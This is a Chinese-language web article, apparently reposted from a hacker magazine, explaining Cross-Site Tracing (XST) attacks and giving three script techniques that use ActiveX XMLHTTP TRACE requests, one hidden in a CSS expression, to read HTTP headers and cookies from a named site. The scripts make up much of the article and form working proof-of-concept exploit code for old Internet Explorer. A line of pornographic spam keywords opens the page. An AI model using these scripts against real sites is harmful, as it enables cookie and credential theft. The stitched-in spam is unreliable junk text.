中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

基礎(chǔ)知識 XST攻擊理論及手法講解

2017-11-30    來源:

容器云強勢上線!快速搭建集群,上萬Linux鏡像隨意使用
出處: 黑客防線

  XST攻擊描述:

  攻擊者將惡意代碼嵌入一臺已經(jīng)被控制的主機上的web文件,當訪問者瀏覽時惡意代碼在瀏覽器中執(zhí)行,然后訪問者的cookie、http基本驗證以及ntlm驗證信息將被發(fā)送到已經(jīng)被控制的主機,同時傳送Trace請求給目標主機,導致cookie欺騙或者是中間人攻擊。

  XST攻擊條件:

  1、需要目標web服務器允許Trace參數(shù);
  2、需要一個用來插入XST代碼的地方;
  3、目標站點存在跨域漏洞。

  XST與XSS的比較:

  相同點:都具有很大的欺騙性,可以對受害主機產(chǎn)生危害,而且這種攻擊是多平臺多技術(shù)的,我們還可以利用Active控件、Flash、Java等來進行XST和XSS攻擊。

  優(yōu)點:可以繞過一般的http驗證以及NTLM驗證

  如何利用:

手法1:

<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft&#46;XMLHTTP\");
xmlHttp&#46;open(\"TRACE\",\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\",false);
xmlHttp&#46;send();
xmlDoc=xmlHttp&#46;responseText;
alert(xmlDoc);
}

//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法2:

<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank&#46;htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin&#46;external;
openWin&#46;location&#46;href=\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\";
setTimeout(
function () {
//以下必須寫在一行
otraceswords&#46;NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft&#46;XMLHTTP\");xmlHttp&#46;open(\"TRACE\",\"[url]http://wmjie&#46;51&#46;net/swords/[/url]\",false);xmlHttp&#46;send();xmlDoc=xmlHttp&#46;responseText;alert(\"不用document&#46;cookie 顯示站點wmjie&#46;51&#46;net/swords/ 的頭信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">
手法3:

<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"[url]http://http://www.tingh.com/[/url]\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"[url]http://wmjie.51.net/swords/[/url]\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">

  后記:研究階段,希望能拋磚引玉,期望和您能夠交流心得體會。

標簽: web服務器 代碼 服務器 漏洞

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:DOS.Elena

下一篇:Win32.Hack.SennaSpyZip